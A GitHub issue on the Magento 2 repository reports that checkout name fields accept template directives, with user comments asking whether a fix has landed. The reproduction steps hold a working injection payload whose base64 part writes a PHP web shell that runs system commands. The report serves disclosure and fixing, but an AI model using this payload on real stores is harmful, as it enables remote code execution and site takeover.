search

magento / magento2

Prior to making any Submission(s), you must sign an Adobe Contributor License Agreement, available here at: https://opensource.adobe.com/cla.html. All Submissions you make to Adobe Inc. and its affiliates, assigns and subsidiaries (collectively “Adobe”) are subject to the terms of the Adobe Contributor License Agreement.
http://www.magento.com
Open Software License 3.0
11.48k stars 9.29k forks source link

Checkout address forms allow random code in the name fields #39002

Open nkarthickannan opened 1 month ago

nkarthickannan commented 1 month ago

Preconditions and environment

Magento version - 2.4.7-p1

Steps to reproduce

  1. Install a fresh Magento latest version with sample data
  2. Add to a product to shopping cart and navigate to the checkout page (either as guest or as logged in user)
  3. Provide the following code in the First name and Last name fields (shipping and billing address fields) {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Expected result

Magento should not allow to proceed by throwing an error

Actual result

Magento allows the user to proceed further without throwing an error

Additional information

Similar issue is already raised and resolved here - https://github.com/magento/magento2/issues/38331

Release note

No response

Triage and priority

Max-Leps commented 2 weeks ago

@in-session

Hello Did they confirm this fix?

in-session commented 2 weeks ago

@Max-Leps No the pull is in the test phase as well as another pull #39131. Whether a merge will ever come is always written in the stars, hence open source. And unfortunately I can't say whether magento does anything here either. @engcom-Bravo https://jira.corp.adobe.com/browse/AC-12687. Is there anything new?

Max-Leps commented 1 week ago

Hello

Any core fix for the issue so far?